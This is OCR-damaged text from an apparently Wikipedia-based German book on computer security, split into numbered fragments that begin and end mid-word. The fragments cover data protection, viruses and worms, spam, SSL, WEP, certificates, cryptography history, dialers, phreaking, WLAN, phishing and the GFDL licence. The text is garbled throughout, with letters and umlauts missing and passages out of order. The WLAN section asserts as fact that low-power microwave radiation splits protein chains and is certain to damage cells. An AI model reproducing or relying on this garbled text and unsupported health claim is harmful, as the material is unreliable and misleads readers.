227. e seiner pers nli chen Daten zug nglich sein sollen Der Datenschutz will den so genannten gl sernen Menschen verhindern Die Bedeutung des Datenschutzes ist seit der Entwicklung der Digitaltech nik stetig gestiegen weil Datenerfassung Datenhaltung Datenweitergabe und Datenanalyse immer einfacher werden Technische Entwicklungen wie Internet E Mail Mobiltelefonie Video berwachung und elektro 14 Datenschutz nische Zahlungsmethoden schaffen neue M glichkeiten zur Datener fassung Interesse an personenbezogenen Informationen haben sowohl staatliche Stellen als auch private Unternehmen Sicherheitsbeh rden m chten bespielsweise durch Rasterfahndung und Telekommunikations berwachung die Verbrechensbek mpfung verbessern Finanzbeh rden sind an Banktransaktionen interessiert um Steuerdelikte aufzudecken Unternehmen versprechen sich von Mitarbeiter berwachung Arbeitneh merdatenschutz h here Effizienz Kundenprofile sollen beim Marketing helfen und Auskunfteien die Zahlungsf higkeit der Kunden sicherstellen Verbraucherdatenschutz Schufa Dieser Entwicklung steht eine gewisse Gleichg ltigkeit gro er Teile der Bev lkerung gegen ber in deren Augen der Datenschutz keine oder nur geringe praktische Bedeutung hat Vor allem durch die weltweite Vernetzung insbesondere durch das Internet nehmen die Gefahren hinsichtlich des Schutzes personenbe zogener Daten laufend zu Das Internet vergisst nicht Datensch tzer m s
228. e weiter hin lauff hig bleiben Die L sung bildet der Nexus ein zweiter Kernel der zum bisherigen Windows hinzugeladen wird Auch ein Entladen des Nexus im laufenden Betrieb ist vorgesehen Nach dem Laden des Ne xus gibt es laut Microsoft zwei Einschr nkungen Computerprogramme d rfen nicht mehr beliebig auf den kompletten Speicher zugreifen und die CPU nicht mehr in den Real Mode versetzen Aufteilung von Windows Zum jetzigen Zeitpunkt Januar 2004 sind laut Microsoft einige wichtige Design Entscheidungen in der NGSCB Entwicklung noch nicht gefallen somit sind die folgenden Ausf hrungen nicht als unab nderlich anzuse hen In den vorhandenen Dokumenten unterscheidet Microsoft grunds tz lich zwischen der unsicheren Seite mit dem normalen Windows Left HandSide und der sicheren Seite des Nexus RightHandSide 114 Next Generation Secure Computing Base Der Nexus verwaltet auf der gesicherten rechten Seite sichere Anwen dungen Agents und TSPs Trusted Service Provider die ein sicheres Pendant zu den Diensten unter Windows darstellen Dienste und Anwen dungen laufen zwar in sicheren Speicherbereichen ab bei beiden handelt es sich aber dennoch um ganz gew hnliche Software Der Nexus sieht sie einfach als sicher an und geht davon aus dass alles andere also auf der LeftHandSide unsicher ist Wie daf r gesorgt wird dass diese sicheren Programme auch sicher sind ist bis jetzt noch unklar Denkbar w re ei
229. e wie Linux und Mac OS X genauso an f llig wenn der Benutzer ausschlie lich als Administrator arbeitet und somit das Rechtesystem nicht eingreifen kann Genau das ist auch das Hauptproblem von aktuellen Microsoft Windows Systemen die ber ein gutes Benutzerrechtesystem verf gen dieses aber normalerweise eine systemweite Virusverbreitung nicht verhindern kann da die meisten An wender aus verschiedenen Gr nden als Administrator arbeiten oder ihr Benutzerkonto Administratorrechte besitzt Wenn ein Anwender mit einem Benutzerkonto mit eingeschr nkten Rechten arbeitet kann ein Virus sich nur auf Dateien verbreiten auf die der Benutzer die entsprechenden Rechte zur Manipulation besitzt Das hei t in der Regel dass Systemdateien vom Virus nicht infiziert werden k nnen solange der Administrator oder mit Administratorrechten ver sehene Systemdienste nicht Dateien des infizierten Benutzers aufrufen Eventuell auf dem gleichen System arbeitende Benutzer k nnen meist ebenfalls nicht infiziert werden so lange sie nicht eine infizierte Datei des infizierten Benutzers ausf hren oder die Rechte des infizierten Benutzers erlauben die Dateien von anderen Benutzern zu ver ndern Da Windows Systeme heute die weiteste Verbreitung haben sind sie derzeit das Hauptziel von Virenautoren Die Tatsache dass sehr viele Win dows Anwender mit Konten arbeiten die Administratorrechte haben so wie die Unkenntnis von Sicherheitspraktiken bei der relativ hoh
230. eachten w hrend nicht wenige andere Provider f r solche Hinweise dankbar sind und den T ter sp testens im Wiederholungsfall vor die T r setzen Beschwerden sind nur sinnvoll wenn man sie so gut es geht mehr oder weniger automatisiert um m glichst viele pro Tag zu verschicken bei spielsweise unter Linus oder auch Unix mit einem Shell oder Perl Script Zu analysieren ist der Header der E Mail der von vielen Mail Clients gar nicht oder nur mit der Schaltfl che Quellcode betrachten gezeigt wird Darin ist alles leicht zu f lschen au er den IP Adressen der MTAs Mail Server die die E Mail transportiert haben Diese stehen in Headerzeilen die mit dem Schl sselwort Received anfangen und unterscheiden sich von potenziellen F lschungen dadurch dass sie in runden oder eckigen Klammern stehen Man verfolgt die Kette dieser Weiterleitungen bis zum ersten System das nicht mehr zum eigenen Provider geh rt denn weiter hinten stehende Systeme k nnen auch gef lscht sein Zu welchem Provi der diese IP Adresse geh rt ermittelt man mit dem Unix Befehl whois und dem Whois Server der zust ndigen Registry Das Format mit dem die einzelnen Whois Server antworten ist unein heitlich Wenn als angeblicher Provider eine Firma mit einem winzigen Class C Netz genannt wird riskiert man dass der vermeintliche Provider 200 Spam und der T ter identisch sind Man muss mit etwas Erfahrung und Ge schick den Upstream also den eige
231. ecret abgeleitet werden und daraus der einmalige Session Key Das ist ein einmalig benutzter symmetrischer Schl ssel der w hrend der Verbindung zum Ver und Entschl sseln der Daten genutzt wird Mit den Nachrichten die die Kommunikati onspartner sich nun gegenseitig zusenden geben sie an ab jetzt nur noch wie ausgehandelt verschl sselt zu bertragen Damit ist die SSL Verbindung aufgebaut Berechnung des Master Secrets Aus dem pre master secret wird mit Hil fe der Hashfunktionen SHA 1 und MD5 das Master Secret berechnet In diese Berechnung flie en zus tzlich die Zufallszahlen der Phase 1 des Handshakes mit ein Es werden hierbei beide Hashfunktionen verwendet um sicherzustellen dass das Master Secret immer noch gesch tzt ist falls eine der Funktionen als kompromittiert gilt Der Vorteil des SSL Protokolls ist die M glichkeit jedes h here Proto koll auf Basis des SSL Protokolls zu implementieren Damit ist eine Unab h ngigkeit von Applikationen und Systemen gew hrleistet Der Nachteil der SSL verschl sselten bertragung besteht darin dass der Verbindungsaufbau auf Serverseite sehr rechenintensiv und deshalb etwas langsamer ist Die Verschl sselung selbst nimmt je nach verwende tem Algorithmus nur noch wenig Rechenzeit in Anspruch Die verschl s selten Daten k nnen von transparenten Kompressionsverfahren etwa auf PPTP Ebene kaum mehr komprimiert werden Als Alternative bietet das TLS Protokoll ab Version 1 0 die
232. eh ren auch die Cyberpunker die als wahre Meis ter ihres Fachs gelten aber nur nach ihren eigenen Regeln leben Ein White Hat Wei Hut handelt um seine Meinung von Informa tionsfreiheit zu verbreiten und um zu beweisen dass es keine 100 ige Sicherheit im Internet geben kann Ein White Hat ist meistens ein Pro grammierer der sich in seinem Bereich sehr gut auskennt Nerd und somit die Schwachstellen wie Puffer berl ufe oder Race Conditions kennt und weif wie man sie vermeiden bzw auch ausnutzen kann Grey Hats Grau H te geben die Informationen an die Offentlich keit weiter Dadurch unterst tzen sie die Black Hats die L cke auszu nutzen lassen allerdings den Entwicklern auch die Chance den Fehler zu beseitigen Im Allgemeinen kann man wenn man zwischen gut und b se unterscheidet die Grey Hats als neutral einstufen Menschen passen allerdings selten eindeutig unter nur einen der H te In der Praxis nimmt diese Unterteilung daher nur wenig Bezug auf real existierende Personen und steht vielmehr als Begrifflichkeit f r eine be stimmte Art des Hackens 179 Sonstige Themen Hackermagazine Seit den 1980ern existieren eine Reihe von Untergrund Magazinen wie das 2600 Magazin und das Phrack Magazin mit denen sich Hacker selbst mit Informationen versorgen Diese Entwicklung wurde von den Phreaks der fr hen 1970er Jahren angeschoben die in illegalen Untergrund Ma gazinen wie der TAP ihre Informationen we
233. einen URL mit ID z B http www example com mail php ID 20032311 021 Systeme der Art die die Reakti on des Sendenden erfordert werden auch als Challenge Response System bezeichnet Viele Anwender und vor allem Administratoren sehen sie jedoch als kein zweckdienliches System zur UBE Vermeidung an und zwar aus folgenden Gr nden Die Absenderadresse einer UBE wird im g nstigsten Fall mit einer ung ltigen Adresse im Normalfall mit der Adresse eines Unbeteilig ten versehen Im Falle einer ung ltigen Adresse f hrt der Versuch der Zustellung der Challenge Mail zu einem Bounce damit also zu einer Ressourcenverschwendung Ist die Adresse g ltig so wird diese vom Challenge Response System bel stigt womit der Benutzer des Sys tems technisch selbst zum T ter wird Versendet der Benutzer eines Challenge Response Systems selbst eine Mail an ein Challenge Response System z B eine Mailingliste mit Confirmed Opt in kommt es zu dem Effekt dass beide Systeme je weils auf die Antwort des anderen Systems warten die Mailliste auf die explizite Best tigung dass die E Mail Adresse in die Liste aufge nommen werden soll das System des Benutzers dass sich die Mailliste als regul rer Benutzer authentifiziert Die Aufnahme eines solchen Benutzers erfolgt dann meist durch manuelles Bearbeiten des Mail listenbetreibers was f r diesen einen entsprechenden Mehraufwand bei der Administration zur Folge hat Ein Benutze
234. einzelnen Netzkno ten H ufig ist diese Basis Station dann auch Mittler in ein weiteres Netz das sowohl Funknetz als auch ein klassisches Kabelnetz sein kann Infra strukturnetze erfordern implementiert man sie sinnvoll mehr Planung OLSR ist ein spezielles Ad hoc Protokoll Im Ad Hoc Modus ist keine Station besonders ausgezeichnet sondern alle sind gleichwertig Ad Hoc Netze lassen sich schnell und ohne gro en Aufwand aufbauen Es ist nicht vorgesehen dass Pakete weitergereicht werden Es kann also vorkommen dass ein physisch zentral stehender Computer das gesamte Netz erreichen kann ein Computer am Randbe reich jedoch nur einen Teil WLANs nach IEEE 802 11 und HIPERLAN unterst tzen beide Be triebsmodi Gerade in WPANs werden gerne Ad Hoc Verfahren einge setzt Datensicherheit Verschl sselung Teil des WLAN Standards IEEE 802 11 ist Wired Equivalent Privacy WEP ein Sicherheitsstandard der den RC4 Al gorithmus enth lt Die enthaltene Verschl sselung mit nur 40 Bit bzw 104 Bit bei einigen Herstellern auch 128 Bit oder 232 Bit reicht jedoch selbst bei 232 Bit 256 Bit genannt langst nicht aus Durch das Sammeln von Schl sselpaaren sind Known Plaintext Attacken m glich Es gibt frei erhaltliche Programme die sogar ohne vollstandigen Paketdurchlauf in der Lage sind einen schnellen Rechner vorausgesetzt das Passwort zu entschliisseln wobei das bei einem 232 Bit Schliissel etwas dauern kann aber eben nicht unm glich
235. eit und Integrit t von Daten gegen ber Dritten garantiert werden bersicht Um beim Einsatz von asymmetrischen Kryptosystemen den Einsatz fal scher z B untergeschobener Schl ssel zu verhindern wird eine Garantie ben tigt dass der verwendete ffentliche Schl ssel auch zum designierten Empf nger der verschl sselten Nachricht bzw zum Sender einer elek tronisch signierten Nachricht geh rt Diese Garantie stellt eine vertrau ensw rdige Stelle in Form eines digitalen Zertifikates aus Man kann sich also ein solches Zertifikat wie einen Personalausweis in digitaler Form vorstellen Beim Personalausweis garantiert die vertrau ensw rdige Stelle Staat dass die Unterschrift die sich auf dem Ausweis befindet auch tats chlich zu der Person geh rt deren Stammdaten und Passbild sich auf dem Ausweis befinden Im Gegensatz zum Personalausweis werden digitale Zertifikate aber von vielen verschiedenen Zertifizierungstellen Bundesnetzagentur Veri 142 Digitales Zertifikat sign Trustcenter u a und in vielen verschiedenen Qualit tsstufen ausge geben Es ist Sache des Benutzers zu entscheiden ob er dem Herausgeber des Zertifikates vertraut Ein digitales Zertifikat enth lt Informationen ber den Namen des Inhabers dessen ffentlichen Schl ssel eine Seriennummer eine G l tigkeitsdauer und den Namen der Zertifizierungsstelle Diese Daten sind in der Regel mit dem privaten Schl ssel der Zertifizierungsstelle signi
236. eit zu verleihen wurden Verschl sselungsalgorithmen ger ne geheim gehalten Die Vergangenheit hat gezeigt dass in Wahrheit das Risiko heimlicher aber routinem iger Angriffe auf verschl sselte Infor mation oder Transportwege viel zu hoch ist Daher bem hen sich ernst zunehmende Wissenschaftler heute die Algorithmen von einer breiten ffentlichkeit analysieren zu lassen Denn nur so lange m glichst viele Fachleute keine Schwachstelle finden gilt ein Verfahren noch als sicher Kerckhoffs Prinzip Schl sselverteilung Eine grobe Unterscheidung in symmetrische und asymmetrische Verschl sselungssysteme ergibt sich aus der Weise wie kryptografische Schl ssel an die am Verfahren Beteiligten vermittelt werden Bei symmetrischen Systemen besitzen beide Kommunikationspartner denselben Schl ssel und m ssen diesen vor Beginn der Kommunikation si cher ausgetauscht haben z B mittels Diffie Hellman Schl sselaustausch oder Zusendung per Post Bekannte klassische symmetrische Verfahren sind die C sar Chiffre der DES komplexit tstheoretisch sicher und das One Time Pad informationstheoretisch sicher Zu den modernen und derzeit als sicher angesehenen Verfahren geh ren der Rijndael Twofish sowie 3DES wobei dem Rijndael durch seine Erhebung zum Advanced Encryption Standard und aufgrund seiner Bevorzugung durch staatliche US amerikanische Stellen eine herausragende Rolle zukommt Asymmetrische Systeme zeichnen sich dadurch aus d
237. el ist erm glicht dieser Ansatz eine theoretisch sehr gute Erkennung Besonders interessant ist dabei ja dass keine Heuristiken verwendet werden welche immer das Risiko von Fehl Erkennungen mit sich bringen Aufgrund der technischen Anforde rungen Reaktionsgeschwindigkeiten etc hielt man dies jedoch f r nicht praktikabel Der Spamfilter SpamStopsHere basiert als zentral gehos tete L sung im Kern jedoch auf genau dieser Idee und zeigt dass dies durchaus auch in der Praxis funktionieren kann Quelle http de wikipedia org wiki Spamfilter Historie 5 2 04 Anonym angelegt danach bearbeitet von den Hauptautoren Urbanus Plenz Mitch Ernstl MichaelDiederich TobiasEgg MFM Steven Malkovich Maverick1976 anonym 12 1 06 1 2 06 WikiPress Redaktion 86 Firewall Firewall Eine Firewall engl Brandmauer ist ein System aus Software und Hardwarekomponenten das den Zugriff zwischen verschiedenen Rech nernetzen beschr nkt um ein Sicherheitskonzept umzusetzen Ein h u figer Einsatzzweck einer Firewall besteht darin den Datenverkehr zwi schen einem zu sch tzenden lokalen Netzwerk LAN und dem Internet zu kontrollieren Hardwarekomponenten einer Firewall sind Rechner mit Netzwerk schnittstellen wie Routern oder Hosts Softwarekomponenten sind bei spielsweise Paketfilter oder Proxyserver Grundgedanke Firewalls sitzen an den Schnittstellen zwischen einzelnen Netzen oder Computersystemen und kontrollieren den
238. elches durch das Ultra System geknackt wurde Be schrieben wurde der Krieg der Codes u a in dem Roman Cryptonomicon von Neal Stephenson Moderne Kryptografie Das Zeitalter moderner Kryptografie begann mit Claude Shannon m g licherweise dem Vater der mathematischen Kryptografie 1949 ver ffent lichte er den Artikel Communication Theory of Secrecy Systems Dieser Artikel zusammen mit seinen anderen Arbeiten ber Informations und Kommunikationstheorie begr ndete eine starke mathematische Basis der Kryptografie 268 Kryptografie 1976 gab es zwei wichtige Fortschritte Erstens war dies der DES Data En cryption Standard Algorithmus entwickelt von IBM und der NSA um sichere Bankdienstleistungen zu erm glichen DES wurde 1977 unter dem Namen FIPS 46 2 Federal Information Processing Standard ver ffentlicht DES und sicherere Varianten davon triple DES werden auch heute noch ein gesetzt DES wurde 2001 durch den neuen FIPS 197 Standard AES ersetzt Der zweite und wichtigere Fortschritt war die Ver ffentlichung des Ar tikels New Directions in Cryptography von Whitfield Diffie und Martin Hellman Dieser Aufsatz stellte eine radikal neue Methode der Schliissel verteilung vor welche als Public Key Kryptografie bekannt wurde und l ste damit eines der fundamentalen Probleme der Kryptografie Vor dieser Entdeckung waren die Schl ssel symmetrisch und der Be sitz eines Schliissels erlaubte sowohl das Verschliisseln als auch da
239. ele kommunikation und Post RegTP gemeldet sein dort sind die Anbieter auch registriert Schutz vor Dialern Um sich zu sch tzen kann man auch bei seiner Telefongesellschaft eine Sperrung aller 0190 Nummern bzw 09009 Nummern f r den eigenen Anschluss beantragen Diese Sperrung betrifft dann allerdings auch den Faxabruf von Informationen die etwa in TV Sendungen angeboten wer den und gilt auch f r Support Rufnummern Benutzer die sich ausschlie lich ber DSL mit dem Internet verbinden sind nicht von Dialern betroffen sofern die Netzwerkkarte ber die die DSL Verbindung zustande kommt die einzige Verbindung des Computers zur Au enwelt ist Ein Dialer kann dann zwar heruntergeladen werden ist jedoch wirkungslos denn eine Einwahl ber DSL ist nicht m glich da es im DSL Netz keine herk mmlichen Telefonnummern gibt Das haben auch die Dialer inzwischen bemerkt und jetzt den Zugang ver ndert Es erscheint nun die Dialogbox Bitte geben Sie Ihre Handynummer ein Sie erhalten sofort den Zugangscode per SMS 110 Dialer Problematische Dialer erkennt man an folgenden Merkmalen Beim Anklicken einer Webseite ffnet sich ein Download Popup Auf der Webseite findet man allenfalls einen versteckten Hinweis auf die entstehenden hohen Kosten Fast alle Links einer Webseite verweisen trotz angeblich unterschiedli chem Inhalt immer auf dieselbe Seite Der Download findet auch dann statt wenn man auf Abbrechen ge klickt h
240. ell verbrei tet gesichtet worden Sicherheitsexperten bef rchten dass die Entwick lung von Handyw rmern zuk nftig das gleiche Ausma annimmt wie die Entwicklung der bereits lange existierenden Computerw rmer Ein wirk licher Schutz gegen Handyw rmer wird zurzeit erst entwickelt Zwar gibt es schon ein Antiviren Programm f r Symbian OS jedoch ist dieses noch beikeinem Handy vorinstalliert enthalten Eine weitere Schutzm glichkeit ein betreiberbasiertes Programm das alle Nachrichten durchsucht ist derzeit noch nicht m glich da die Verz gerung bis zum Empfangen ei ner Nachricht zu gro werden w rde Antivirenhersteller empfehlen ihren Kunden daher Bluetooth standardm ig zu deaktivieren return 8 Schutz Wenn man sich vor W rmern sch tzen m chte muss man sich erst fragen vor welchen Angriffen genau man sich denn sch tzen m chte Nur vor dem konkreten Einzelfall oder Klassen von konkreten Einzelf llen kann man sich sch tzen Man muss also die konkreten Verbreitungs bzw Angriffs methoden kennen verstanden haben und dazu passende Schutzmechanis men planen und umsetzen Sich unwohl f hlen oder sich besser f hlen mit bestimmten Ma nahmen sind keine Kriterien f r einen vern nftigen Schutz Auch blind Schutz Software zu installieren ist nicht zielf hrend 55 Viren W rmer Trojaner Sicherheitsl cken in Anwendungen Heutige Anwendungen sind so komplex dass nicht mehr garantiert wer den kann
241. ellen aus Bluebox das Nutzen spezieller kostenfreier Rufnummern f r Telefontech niker ber die zeitweilig Verbindungen zu beliebigen Gegenstellen hergestellt werden konnten und hnliches Grundlage war ein Entwurfsfehler im ana logen Telefonnetz der USA der ab den 1960er Jahren zunehmend bekannt wurde viele Funktionen des Netzes wurden ohne Authen z tifizierung ber Signalt ne gesteuert die mit Abb 17 John T Draper ist einer tels einfacher selbstgebastelter elektronischer der ersten Phreaker Schaltungen von jedermann eingespeist werden konnten Dazu wurde mit tels der imitierten Ton Steuersignale ein kostenloser Anruf z B ein Orts gespr ch beendet jedoch war es m glich nach dieser besonderen Art der Gespr chsbeendigung eine neue Nummer z B ein teures Ferngespr ch zum alten kostenlosen Tarifzu w hlen Viele Phreaks betrieben es um die damals noch recht hohen Telefonkosten f r ihre langandauernde Modem oder Akustikkoppler und DF Verbindungen nicht tragen zu m ssen 02 213 Angriffe Das Wort und die Methode brachte vor allem der Telefonhacker John T Draper Aliasname Captain Crunch in den sp ten 1960er Jahren in Umlauf und pr gte auch den Namen Blue Boxing AT amp T war jahrelang machtlos da zum Unterbinden des Phreakings ein gro er Teil der Netzin frastruktur im ganzen Land ersetzt werden musste In Deutschland bediente man sich dieser M glichkeit ber die Nutzung von kostenfreien 0130
242. en gewinn in dBi indem sie elektromagnetische Wellen b ndeln Recht lich darf die Sendeleistung aller Komponenten zusammengenommen in Deutschland 100 mW 20 dBm EIRP bei 2 4GHz bzw 1000 mW EIRP bei 5 7 GHz mit TPC und DFS nicht bersteigen Es besteht keine Melde pflicht Der Betreiber tr gt die Verantwortung dass seine Anlage die vor geschriebenen Grenzwerte nicht berschreitet Es d rfen in Deutschland uneingeschr nkt auch selbstgebaute Antennen verwendet werden hierf r ist keine Amateurfunklizenz notwendig da die Regulierungsbeh rde f r Telekommunikation und Post RegTP fr her Bundespost BAPT und heute Bundesnetzagentur f r Elektrizit t Gas Telekommunikation Post und Eisenbahnen die entsprechenden Frequenzbereiche in einer Allge meinzuteilung lizenzfrei gestellt hat 243 WLAN Berechnet wird die Sendeleistung in dBm eines WLAN Ger tes aus Sendeleistung dBm Gewinn Verst rker dB falls vorhanden D mpfung Kabel dB D mpfung Stecker dB D mpfung Blitzschutz dB Gewinn Antenne dBi Gesamtsendeleistung Berechnet wird lediglich der Sendeweg F r den Empfangsweg wurden von Seiten des Gesetzgebers keine Beschr nkungen erlassen Einige WLAN Ger te beherrschen auch Antenna Diversity Modes bei denen die durch Interferenzen verursachten Fehler verringert werden indem zwei Antennen gleichzeitig zum Empfang bzw abwechselnd zum Senden verwendet werden WDS Bridging und Repea
243. en Diese Variante des Onlinebankings ist dar ber hinaus sehr komfortabel da die Eingabe von TANs entf llt Als weiterer Sicherheitsgewinn ist die sichere PIN Eingabe entsprechender Chipkartenleser vorausgesetzt zu nennen bei der ein Belauschen der PIN Eingabe mit einem Keylogger oder Trojaner nicht m glich ist Neu eingef hrt wurden und werden indizierte TAN Listen Dadurch kann das Online Banking vorgeben dass eine bestimmte TAN der Lis te zu benutzen ist und nicht wie bisher die n chste oder eine beliebige W hrend im Bankverkehr diese zus tzlichen Schutzm glichkeiten ge nutzt werden k nnen sind nach einer erfolgreichen Phishing Attacke bei den anderen Dienstleistern zum Beispiel Versandh user Internet Aktionsh user Onlineberatungen Kontaktportale s mtliche vorhan denen Daten ungesch tzt und k nnen von interessierter Seite zum Bei spiel illegal arbeitende Auskunfteien personenbezogen verdichtet und missbraucht werden Beispiele Eine aktuelle E Mail kommt derzeit angeblich von eBay diese verweist auf einen Link der auffordert aktuelle Accountdaten und Kreditkarten informationen einzugeben Nat rlich will der Betreiber nur Accountdaten aussp hen und an Kreditkarteninformationen gelangen e Stadtsparkasse M nchen Sehr geehrter Kunde Da gegenw rtig die Betrugereien mit den Bankkonten von unseren Kundschaften fters zustande kommen sind wir gen tigt nachtr glich eine zus tzliche Autorisation
244. en sch dliche Auswirkungen auf Organismen haben Bei den Leistun gen innerhalb eines Mikrowellenherdes oder in der N he milit rischer Radaranlagen sind sch dliche Auswirkungen unbestritten 241 WLAN Im Unterschied zu GSM senden WLAN Ger te jedoch mit einer deutlich niedrigeren Sendeleistung 0 1 Watt statt 1 10 Watt und mittels Frequenz spreizung mit einer h heren Bandbreite Die Energie pro Frequenzband ist also deutlich niedriger und teilweise kaum vom Hintergrundrauschen zu unterscheiden Trotzdem stellt die Mikrowellenstrahlung f r den menschlichen Organismus eine Belastung dar Die Mikrowellenstrahlung f hrt sehr wohl auch bei niedrigen Energieniveaus zur Spaltung von Mo lek l und insbesondere Eiwei ketten da die Energie der Mikrowelle auf jeden Fall vom Organismus nicht nur reflektiert sondern auch absorbiert wird Genau hier liegt die gro e Gefahr Dem Menschen passiert nur so lange nichts wie seine Zellen in der Lage sind die durch Mikrowellen garantiert auftretenden Zellsch digungen zu reparieren Bei sehr starker Strahlung ist also lediglich die Wahrscheinlichkeit zu erkranken entspre chend h her Zu beachten ist allerdings dass die 0 1 Watt bei 802 11b g bzw 1 Watt bei 802 11a h nicht die Grenze des technisch M glichen dar stellen Es handelt sich vielmehr um eine gesetzgeberische bzw regula torische Grenze Viele WLAN Komponenten sind technisch in der Lage h here Sendeleistungen zu bieten Hinzu ko
245. en und Herausgeber des Dokuments erteilen durch diese Lizenz nicht die Genehmigung in ihrem Namen irgendeine modifizierte Version zu bewerben oder ihnen Billigung daf r zu unterstellen oder daraus herzuleiten 333 Anhang 5 DOKUMENTE VERBINDEN Sie k nnen das Dokument mit anderen Dokumenten verbinden die unter dieser Lizenz freigegeben sind unter den Bedingungen des Paragraphen 4 siehe oben f r modifizierte Versionen Die Voraussetzung daf r ist dass Sie bei dieser Verbindung alle unver nderlichen Abschnitte aller Originaldokumente unver ndert einf gen dass Sie diese vollst ndig als unver nderliche Abschnitte Ihres verbundenen Werks im Lizenzhinweis auff hren und dass Sie deren Haftungsausschl sse vollst ndig bewahren Das verbundene Werk braucht nur eine Kopie dieser Lizenz zu enthalten und mehrere identische unver nderliche Abschnitte k nnen durch eine einzige Kopie ersetzt werden Gibt es mehrere unver nderliche Abschnitte mit gleichem Namen aber verschiedenen Inhalten so vergeben Sie f r jeden solchen Abschnitt einen eindeutigen Titel indem Sie am Ende falls bekannt den Namen des urspr nglichen Autors oder Herausgebers in Klammern hinzuf gen oder andernfalls eine eindeutige Nummer anh ngen Verfahren Sie entsprechend mit den Abschnittstiteln im Verzeichnis der unver nderlichen Abschnitte im Lizenzhinweis des verbundenen Werks Beim Verbinden von Dokumenten m ssen Sie jeden mit Historie berschriebenen Abs
246. en Anh ngen Es sollten keine unverlangten Anh nge ge ffnet werden Auch bekannte Absender sind keine Gew hrleistung der Echtheit da zum einen die Absender meist gef lscht sind und zum anderen bekannte Absender ebenfalls Opfer von W rmern werden k nnen Im Zweifelsfall sollte man beim Absender nachfragen Vor dem ffnen zugesandter Dateien ist eine vorbeugende Pr fung mit der Antivirensoftware niemals falsch Schutz durch Software Virenscanner Ein Virenscanner kann im Einzelfall Infektionen verhin dern wenn er vor dem Ausf hren einer Datei die einen Wurm enth lt diese pr ft den Wurm erkennt und zugleich das Ausf hren verhindert oder schon im Vorfeld bei Routine Scans diese Datei entdeckt und der Anwender darauf aufmerksam gemacht wird Ein solches Szenario ist beim Social Engineering denkbar wo dem Anwender nicht klar ist dass er eine Datei ausf hrt oder ber die Eigenschaften des Programms ge t uscht wird Da der Virenscanner aber den Wurm m glicherweise nicht kennt ist dieses Szenario durch einen Virenscanner nicht abgedeckt Zahlreiche andere Infektionsm glichkeiten k nnen vom Virenscanner gar nicht verhindert werden beispielsweise die Infektion ber eine laufen de Server Anwendung Die Bereinigung eines infizierten Systems ist durch einen Virenscan ner nicht zuverl ssig m glich Hersteller von Virenscannern empfehlen das Neuaufsetzen des infizierten Systems Personal Firewalls Es kann hilfreich sein eine
247. en Fragen besch ftigt und der nichts enth lt das direkt zum eigentlichen Thema geh rt Wenn das Dokument beispielsweise in Teilen ein Buch ber Mathematik ist dann darf in einem sekund ren Abschnitt nichts ber Mathematik erkl rt werden Bei dem Verh ltnis kann es sich um eine historische Verbindung zum Thema oder damit zusammenh ngende Fragen handeln oder um darauf bezogene gesetzliche gewerbliche philosophische ethische oder politische Standpunkte Unver nderliche Abschnitte sind bestimmte sekund re Abschnitte deren Titelindem Hinweis dass das Dokument dieser Lizenz unterstellt ist als unver nderliche Abschnitte bezeichnet werden Wenn ein Abschnitt nicht unter die oben stehende Definition eines sekund ren Abschnitts f llt dann ist es nicht erlaubt ihn als unver nderlich zu bezeichnen Es m ssen in einem Dokument keine unver nderlichen Abschnitte vorkommen Wenn das Dokument keine unver nderlichen Abschnitte festlegt gibt es keine Umschlagtexte sind bestimmte kurze Textabschnitte die als vordere Umschlagtexte oder hintere Umschlagtexte in dem Hinweis aufgelistet sind der besagt dass das Dokument dieser Lizenz unterstellt ist Ein vorderer Umschlagtext darf h chstens f nf Worte enthalten ein hinterer Umschlagtext h chstens 25 Worte Eine transparente Kopie des Dokuments ist eine maschinenlesbare Kopie in einem Format dessen Spezifikation allgemein verf gbar ist Das hei t dass sie mit einem gew hnli
248. en Staaten im Krieg M glicherweise w re es so gar nicht zum Zwei ten Weltkrieg gekommen und vielen Millionen Menschen auf allen Seiten w re Leid und Tod erspart geblieben Vielleicht w re aber alles noch viel schrecklicher geworden und Atombomben w ren ber Europa explodiert Das alles sind Spekulationen deutlich wird allerdings die enorme Be deutung der Kryptografie und der Kryptanalyse der Schl sselmaschine Enigma f r den Verlauf der Geschichte Bemerkenswert ist berdies die Tatsache der funktionierenden Ge heimhaltung der ber entzifferte Enigma Funkspr che gewonnenen In formationen Tarnname ULTRA durch die Alliierten w hrend und selbst nach dem Krieg bis in die 1970er Jahre Aufgrund verschiedener verd chtiger Ereignisse wurden auf deutscher Seite mehrfach Untersuchungen angestellt wie es um die Sicherheit des Nachrichtenverkehrs bestellt sei insbesondere auch beim T52 Fernschrei ber FISH Hier wurden jedoch die falschen Schlussfolgerungen gezogen die Personen mit der richtigen Einsch tzung haben sich nicht durchge setzt Dies war umso verh ngnisvoller als die Abh ngigkeit vom sicheren Funkverkehr extrem hoch war und die Geheimhaltung des Schl sselein bruchs alliierterseits erstaunlich erfolgreich Nach dem Krieg wurden erbeutete sowie nachgebaute Enigma Ger te von den Siegerm chten vor allem von England und den USA in den Na hen Osten und nach Afrika verkauft Den Siegerm chten war es so m g lich den N
249. en Zahl unerfahrener Privatanwender macht Windows Systeme noch lohnender zum Ziel von Virenautoren 24 Computervirus W hrend f r Windows Systeme ber 60 000 Viren bekannt sind liegt die Zahl der bekannten Viren f r Linux und dem klassischen Mac OS jeweils bei etwa 50 f r das seit einiger Zeit aktuelle auf dem Unix Subsystem Darwin basierenden Mac OS X welches bereits seit 2001 auf dem Markt ist ist zumindest bisher Dezember 2005 kein einziges Virus bekannt In freier Wildbahn werden allerdings weitaus weniger verschiedene Viren beobachtet als theoretisch bekannt sind Die meist kommerzielle Nutzung von Apple und Unix Computern allgemein f hrt unter anderem auch dazu dass der Sicherheitsstandard h her ist weil professionell betreute Computersysteme oft gut gesch tzt werden Au erdem macht die geringe Verbreitung von Macintosh Rech nern die Virenentwicklung weniger lohnend Bei Unix und Linux Systemen sorgen die h heren Sicherheitsstan dards und die noch nicht so hohe Verbreitung dieser Systeme bei Endan wendern daf r dass sie f r Virenautoren momentan kein lohnendes Ziel darstellen und Viren in freier Wildbahn praktisch nicht vorkommen Anders sieht es bei Computerw rmern aus Diese Systeme sind wegen der hohen Marktanteile bei Internet Servern mittlerweile ein h ufiges Ziel von Wurmautoren Schutz durch Live Systeme Live Systeme wie Knoppix die unabh n gig vom installierten Betriebssystem von einer
